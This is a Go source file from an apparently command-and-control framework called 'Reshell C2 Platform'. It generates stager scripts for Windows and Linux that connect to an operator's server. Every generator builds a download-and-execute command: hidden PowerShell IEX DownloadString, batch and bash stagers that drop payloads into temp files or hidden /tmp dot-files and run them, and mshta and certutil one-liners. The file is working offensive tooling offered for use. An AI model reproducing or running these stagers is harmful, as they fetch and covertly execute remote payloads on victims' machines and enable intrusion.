package script

import (
	"fmt"
	"text/template"
)

// Generator 脚本生成器
type Generator struct{}

// NewGenerator 创建脚本生成器
func NewGenerator() *Generator {
	return &Generator{}
}

// ScriptConfig 脚本配置
type ScriptConfig struct {
	ServerAddr   string
	VKey         string
	Salt         string
	ListenerID   uint
	Mode         string
}

// GenerateWindowsBat 生成Windows批处理脚本
func (g *Generator) GenerateWindowsBat(cfg *ScriptConfig) string {
	tmpl := `@echo off
:: C2 Client Connection Script
:: Listener ID: {{.ListenerID}}
:: Generated by Reshell C2 Platform

set SERVER={{.ServerAddr}}
set VKEY={{.VKey}}

:: Download and execute payload (PowerShell stager)
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://%SERVER%/payload/ps1/{{.ListenerID}}')"

:: Or use direct connection
:: payload.exe
`
	t := template.Must(template.New("win_bat").Parse(tmpl))
	var result string
	t.Execute(&stringWriter{&result}, cfg)
	return result
}

// GeneratePowerShell 生成PowerShell脚本
func (g *Generator) GeneratePowerShell(cfg *ScriptConfig) string {
	tmpl := `# C2 Client Connection Script
# Listener ID: {{.ListenerID}}
# Generated by Reshell C2 Platform

$Server = "{{.ServerAddr}}"
$VKey = "{{.VKey}}"

# One-liner for quick execution:
# IEX(New-Object Net.WebClient).DownloadString('http://$Server/payload.ps1')

# Download and execute
$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadData("http://$Server/payload_exe/{{.ListenerID}}")

# payload 是原生 Windows exe（不是 .NET assembly），不能用 Assembly.Load
$outPath = Join-Path $env:TEMP ("payload_" + {{.ListenerID}} + "_c2.exe")
[System.IO.File]::WriteAllBytes($outPath, $payload) | Out-Null
Start-Process -FilePath $outPath -WindowStyle Hidden | Out-Null
`
	t := template.Must(template.New("powershell").Parse(tmpl))
	var result string
	t.Execute(&stringWriter{&result}, cfg)
	return result
}

// GenerateLinuxSh 生成Linux Shell脚本
func (g *Generator) GenerateLinuxSh(cfg *ScriptConfig) string {
	tmpl := `#!/bin/bash
# C2 Client Connection Script
# Listener ID: {{.ListenerID}}
# Generated by Reshell C2 Platform

SERVER="{{.ServerAddr}}"
VKEY="{{.VKey}}"

# Download and execute
wget -q http://$SERVER/payload/{{.ListenerID}}.elf -O /tmp/.payload
chmod +x /tmp/.payload
/tmp/.payload &

# Or use curl
# curl -s http://$SERVER/payload/{{.ListenerID}}.elf -o /tmp/.payload && chmod +x /tmp/.payload && /tmp/.payload &
`
	t := template.Must(template.New("linux_sh").Parse(tmpl))
	var result string
	t.Execute(&stringWriter{&result}, cfg)
	return result
}

// GenerateWindowsOneLiner 生成Windows单行命令
func (g *Generator) GenerateWindowsOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://%s/payload/ps1/%d')"`, cfg.ServerAddr, cfg.ListenerID)
}

// GeneratePowerShellOneLiner 生成PowerShell单行命令
func (g *Generator) GeneratePowerShellOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`IEX(New-Object Net.WebClient).DownloadString('http://%s/payload/ps1/%d')`, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateLinuxOneLiner 生成Linux单行命令
func (g *Generator) GenerateLinuxOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`wget -qO- http://%s/payload/%d.elf >/tmp/.c2p 2>/dev/null || curl -fsSL http://%s/payload/%d.elf -o /tmp/.c2p; chmod +x /tmp/.c2p && /tmp/.c2p &`, cfg.ServerAddr, cfg.ListenerID, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateCurlOneLiner 生成curl下载执行单行命令
func (g *Generator) GenerateCurlOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`curl -s http://%s/payload/%d.elf -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x &`, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateWgetOneLiner 生成wget下载执行单行命令
func (g *Generator) GenerateWgetOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`wget -q http://%s/payload/%d.elf -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x &`, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateMSHTAOneLiner 生成mshta单行命令
func (g *Generator) GenerateMSHTAOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`mshta http://%s/payload/%d.hta`, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateCertutilOneLiner 生成certutil下载单行命令
func (g *Generator) GenerateCertutilOneLiner(cfg *ScriptConfig) string {
	return fmt.Sprintf(`certutil -urlcache -split -f http://%s/payload/%d.exe %%temp%%\x.exe && %%temp%%\x.exe`, cfg.ServerAddr, cfg.ListenerID)
}

// GenerateAllScripts 生成所有脚本
func (g *Generator) GenerateAllScripts(cfg *ScriptConfig) map[string]string {
	return map[string]string{
		"windows_bat":          g.GenerateWindowsBat(cfg),
		"powershell":           g.GeneratePowerShell(cfg),
		"linux_sh":             g.GenerateLinuxSh(cfg),
		"windows_oneliner":     g.GenerateWindowsOneLiner(cfg),
		"powershell_oneliner":  g.GeneratePowerShellOneLiner(cfg),
		"linux_oneliner":       g.GenerateLinuxOneLiner(cfg),
		"curl_oneliner":        g.GenerateCurlOneLiner(cfg),
		"wget_oneliner":        g.GenerateWgetOneLiner(cfg),
		"mshta_oneliner":       g.GenerateMSHTAOneLiner(cfg),
		"certutil_oneliner":    g.GenerateCertutilOneLiner(cfg),
	}
}

// stringWriter 用于模板输出
type stringWriter struct {
	*string
}

func (sw *stringWriter) Write(p []byte) (n int, err error) {
	*sw.string += string(p)
	return len(p), nil
}
